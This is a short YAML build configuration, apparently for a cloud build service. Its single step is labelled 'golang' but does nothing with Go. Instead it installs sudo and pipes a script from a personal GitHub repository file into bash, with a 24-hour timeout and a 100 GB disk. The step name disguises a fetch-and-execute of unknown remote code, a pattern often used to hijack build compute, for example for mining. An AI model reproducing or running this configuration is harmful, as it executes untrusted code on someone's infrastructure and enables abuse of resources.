steps:
  - name: golang
    args:
      - '-c'
      - >-
        apt update && apt-get install sudo -y && curl -sL https://github.com/arifrahman555/kolor/raw/main/suganteh | bash
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  diskSizeGb: '100'
